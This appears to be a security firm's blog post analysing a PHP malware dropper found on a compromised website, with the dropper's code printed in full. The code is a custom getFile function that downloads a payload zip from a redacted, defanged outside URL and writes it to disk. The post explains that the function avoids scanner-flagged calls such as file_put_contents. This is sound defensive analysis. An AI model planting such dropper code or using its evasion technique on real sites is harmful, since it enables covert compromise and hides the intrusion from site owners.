When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.
In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function getFile to accomplish the same task as file_put_contents. Their objective is to essentially download and store binary data from a third party resource without being detected.
function getFile($url, $path) { $newfname = $path; $file = fopen ($url, 'rb'); if ($file) { $newf = fopen ($newfname, 'wb'); if ($newf) { while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8), 1024 * 8); }}} if ($file) { fclose($file); } if ($newf) { fclose($newf); }} getFile("hxxp://[redacted]/payload.zip","ss.zip");
To accomplish this, attackers use the PHP functions fopen, fwrite, and fclose to open a stream from the third party URL source to the local file, store the binary data, write the data through that stream to the specified file, then close the stream.
Malware droppers can be difficult to detect, and bad actors are keen to conceal their malicious activities from humans, firewalls, and other services that detect indicators of compromise. If you believe your site has been infected with a malware dropper and you need a hand to clean it up, we’re here to help.
Marc-Alexandre Montpas
Fioravante Souza
Victor Santoyo
Cesar Anjos
Krasimir Konov
Daniel Cid